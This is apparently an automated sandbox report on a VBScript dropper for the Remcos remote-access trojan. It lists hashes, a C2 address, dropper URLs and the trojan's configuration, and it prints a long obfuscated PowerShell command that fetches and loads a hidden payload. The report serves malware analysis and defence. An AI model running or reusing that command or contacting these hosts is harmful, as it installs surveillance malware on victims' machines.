Analysis
-
max time kernel
147s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
30-08-2024 07:14
General
-
Target
SI_56127.vbs
-
Size
721KB
-
MD5
1f9e4ba03418a882f49d1dea07a9e8fd
-
SHA1
c348ea91f0bc50a2ebe18eb9f1037864ee2c04a9
-
SHA256
b53499f1ec9a4a7686cee01d45788b83b7dc379dbaaf601c88be300b4495954d
-
SHA512
c433c66abf1feb534fb9610c5dcfc37a26bbd8139e3d97257e58f6336b3be263b05f3cd13dd3396e50b010f97efaed76908ec737e02aded473f8a69d91f46b3f
-
SSDEEP
12288:DubTgK1Um2OMMNiq0rrIl61YxQz6Q4cW0+fmJT/E6j4AfG8xOHft+s+Y9iyMxuep:qXD2A4sQKemA
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Extracted
Family
remcos
Botnet
RemoteHost
C2
remcosco222.duckdns.org:5642
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-UFGYXJ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SI_56127.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⊤ ⪛ ㈿ ∿ ⇐Bp⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐VQBy⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐9⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐JwBo⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bw⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐Og⊤ ⪛ ㈿ ∿ ⇐v⊤ ⪛ ㈿ ∿ ⇐C8⊤ ⪛ ㈿ ∿ ⇐aQBh⊤ ⪛ ㈿ ∿ ⇐Dg⊤ ⪛ ㈿ ∿ ⇐M⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐z⊤ ⪛ ㈿ ∿ ⇐DE⊤ ⪛ ㈿ ∿ ⇐M⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐0⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐dQBz⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐YQBy⊤ ⪛ ㈿ ∿ ⇐GM⊤ ⪛ ㈿ ∿ ⇐a⊤ ⪛ ㈿ ∿ ⇐Bp⊤ ⪛ ㈿ ∿ ⇐HY⊤ ⪛ ㈿ ∿ ⇐ZQ⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐G8⊤ ⪛ ㈿ ∿ ⇐cgBn⊤ ⪛ ㈿ ∿ ⇐C8⊤ ⪛ ㈿ ∿ ⇐Mg⊤ ⪛ ㈿ ∿ ⇐3⊤ ⪛ ㈿ ∿ ⇐C8⊤ ⪛ ㈿ ∿ ⇐aQB0⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bQBz⊤ ⪛ ㈿ ∿ ⇐C8⊤ ⪛ ㈿ ∿ ⇐dgBi⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐Xw⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐D⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐Mg⊤ ⪛ ㈿ ∿ ⇐0⊤ ⪛ ㈿ ∿ ⇐D⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐Nw⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐DY⊤ ⪛ ㈿ ∿ ⇐Xw⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐D⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐Mg⊤ ⪛ ㈿ ∿ ⇐0⊤ ⪛ ㈿ ∿ ⇐D⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐Nw⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐DY⊤ ⪛ ㈿ ∿ ⇐LwB2⊤ ⪛ ㈿ ∿ ⇐GI⊤ ⪛ ㈿ ∿ ⇐cw⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐Go⊤ ⪛ ㈿ ∿ ⇐c⊤ ⪛ ㈿ ∿ ⇐Bn⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐Ow⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐Hc⊤ ⪛ ㈿ ∿ ⇐ZQBi⊤ ⪛ ㈿ ∿ ⇐EM⊤ ⪛ ㈿ ∿ ⇐b⊤ ⪛ ㈿ ∿ ⇐Bp⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bgB0⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐PQ⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐E4⊤ ⪛ ㈿ ∿ ⇐ZQB3⊤ ⪛ ㈿ ∿ ⇐C0⊤ ⪛ ㈿ ∿ ⇐TwBi⊤ ⪛ ㈿ ∿ ⇐Go⊤ ⪛ ㈿ ∿ ⇐ZQBj⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐BT⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐cwB0⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bQ⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐E4⊤ ⪛ ㈿ ∿ ⇐ZQB0⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐VwBl⊤ ⪛ ㈿ ∿ ⇐GI⊤ ⪛ ㈿ ∿ ⇐QwBs⊤ ⪛ ㈿ ∿ ⇐Gk⊤ ⪛ ㈿ ∿ ⇐ZQBu⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐Ow⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐Gk⊤ ⪛ ㈿ ∿ ⇐bQBh⊤ ⪛ ㈿ ∿ ⇐Gc⊤ ⪛ ㈿ ∿ ⇐ZQBC⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐9⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐B3⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐YgBD⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐aQBl⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐EQ⊤ ⪛ ㈿ ∿ ⇐bwB3⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐b⊤ ⪛ ㈿ ∿ ⇐Bv⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐BE⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐Cg⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐Bp⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐VQBy⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐KQ⊤ ⪛ ㈿ ∿ ⇐7⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐aQBt⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐ZwBl⊤ ⪛ ㈿ ∿ ⇐FQ⊤ ⪛ ㈿ ∿ ⇐ZQB4⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐9⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐WwBT⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐cwB0⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bQ⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐FQ⊤ ⪛ ㈿ ∿ ⇐ZQB4⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐LgBF⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐YwBv⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐aQBu⊤ ⪛ ㈿ ∿ ⇐Gc⊤ ⪛ ㈿ ∿ ⇐XQ⊤ ⪛ ㈿ ∿ ⇐6⊤ ⪛ ㈿ ∿ ⇐Do⊤ ⪛ ㈿ ∿ ⇐VQBU⊤ ⪛ ㈿ ∿ ⇐EY⊤ ⪛ ㈿ ∿ ⇐O⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐Ec⊤ ⪛ ㈿ ∿ ⇐ZQB0⊤ ⪛ ㈿ ∿ ⇐FM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐By⊤ ⪛ ㈿ ∿ ⇐Gk⊤ ⪛ ㈿ ∿ ⇐bgBn⊤ ⪛ ㈿ ∿ ⇐Cg⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐Bp⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐QgB5⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐ZQBz⊤ ⪛ ㈿ ∿ ⇐Ck⊤ ⪛ ㈿ ∿ ⇐Ow⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BG⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐PQ⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐P⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐8⊤ ⪛ ㈿ ∿ ⇐EI⊤ ⪛ ㈿ ∿ ⇐QQBT⊤ ⪛ ㈿ ∿ ⇐EU⊤ ⪛ ㈿ ∿ ⇐Ng⊤ ⪛ ㈿ ∿ ⇐0⊤ ⪛ ㈿ ∿ ⇐F8⊤ ⪛ ㈿ ∿ ⇐UwBU⊤ ⪛ ㈿ ∿ ⇐EE⊤ ⪛ ㈿ ∿ ⇐UgBU⊤ ⪛ ㈿ ∿ ⇐D4⊤ ⪛ ㈿ ∿ ⇐Pg⊤ ⪛ ㈿ ∿ ⇐n⊤ ⪛ ㈿ ∿ ⇐Ds⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐BG⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐PQ⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐P⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐8⊤ ⪛ ㈿ ∿ ⇐EI⊤ ⪛ ㈿ ∿ ⇐QQBT⊤ ⪛ ㈿ ∿ ⇐EU⊤ ⪛ ㈿ ∿ ⇐Ng⊤ ⪛ ㈿ ∿ ⇐0⊤ ⪛ ㈿ ∿ ⇐F8⊤ ⪛ ㈿ ∿ ⇐RQBO⊤ ⪛ ㈿ ∿ ⇐EQ⊤ ⪛ ㈿ ∿ ⇐Pg⊤ ⪛ ㈿ ∿ ⇐+⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐Ow⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BJ⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐Hg⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐9⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐Bp⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐V⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐Hg⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐Ek⊤ ⪛ ㈿ ∿ ⇐bgBk⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐e⊤ ⪛ ㈿ ∿ ⇐BP⊤ ⪛ ㈿ ∿ ⇐GY⊤ ⪛ ㈿ ∿ ⇐K⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BG⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐Ck⊤ ⪛ ㈿ ∿ ⇐Ow⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bgBk⊤ ⪛ ㈿ ∿ ⇐Ek⊤ ⪛ ㈿ ∿ ⇐bgBk⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐e⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐Gk⊤ ⪛ ㈿ ∿ ⇐bQBh⊤ ⪛ ㈿ ∿ ⇐Gc⊤ ⪛ ㈿ ∿ ⇐ZQBU⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐e⊤ ⪛ ㈿ ∿ ⇐B0⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐SQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐ZQB4⊤ ⪛ ㈿ ∿ ⇐E8⊤ ⪛ ㈿ ∿ ⇐Zg⊤ ⪛ ㈿ ∿ ⇐o⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐ZQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐RgBs⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐Zw⊤ ⪛ ㈿ ∿ ⇐p⊤ ⪛ ㈿ ∿ ⇐Ds⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐Bz⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐YQBy⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐SQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐ZQB4⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐LQBn⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐w⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐LQBh⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐ZQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐SQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐ZQB4⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐LQBn⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BJ⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐Hg⊤ ⪛ ㈿ ∿ ⇐Ow⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BJ⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐Hg⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐r⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BG⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐YQBn⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐T⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐ZwB0⊤ ⪛ ㈿ ∿ ⇐Gg⊤ ⪛ ㈿ ∿ ⇐Ow⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐GI⊤ ⪛ ㈿ ∿ ⇐YQBz⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐Ng⊤ ⪛ ㈿ ∿ ⇐0⊤ ⪛ ㈿ ∿ ⇐Ew⊤ ⪛ ㈿ ∿ ⇐ZQBu⊤ ⪛ ㈿ ∿ ⇐Gc⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bo⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐PQ⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐ZQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐SQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐ZQB4⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐LQ⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐cwB0⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐cgB0⊤ ⪛ ㈿ ∿ ⇐Ek⊤ ⪛ ㈿ ∿ ⇐bgBk⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐e⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐7⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐YgBh⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐ZQ⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐QwBv⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐bQBh⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐Gk⊤ ⪛ ㈿ ∿ ⇐bQBh⊤ ⪛ ㈿ ∿ ⇐Gc⊤ ⪛ ㈿ ∿ ⇐ZQBU⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐e⊤ ⪛ ㈿ ∿ ⇐B0⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐UwB1⊤ ⪛ ㈿ ∿ ⇐GI⊤ ⪛ ㈿ ∿ ⇐cwB0⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐aQBu⊤ ⪛ ㈿ ∿ ⇐Gc⊤ ⪛ ㈿ ∿ ⇐K⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BJ⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐Hg⊤ ⪛ ㈿ ∿ ⇐L⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐YgBh⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐ZQ⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐T⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐ZwB0⊤ ⪛ ㈿ ∿ ⇐Gg⊤ ⪛ ㈿ ∿ ⇐KQ⊤ ⪛ ㈿ ∿ ⇐7⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐YwBv⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐bQBh⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐BC⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐9⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐WwBT⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐cwB0⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bQ⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐EM⊤ ⪛ ㈿ ∿ ⇐bwBu⊤ ⪛ ㈿ ∿ ⇐HY⊤ ⪛ ㈿ ∿ ⇐ZQBy⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐XQ⊤ ⪛ ㈿ ∿ ⇐6⊤ ⪛ ㈿ ∿ ⇐Do⊤ ⪛ ㈿ ∿ ⇐RgBy⊤ ⪛ ㈿ ∿ ⇐G8⊤ ⪛ 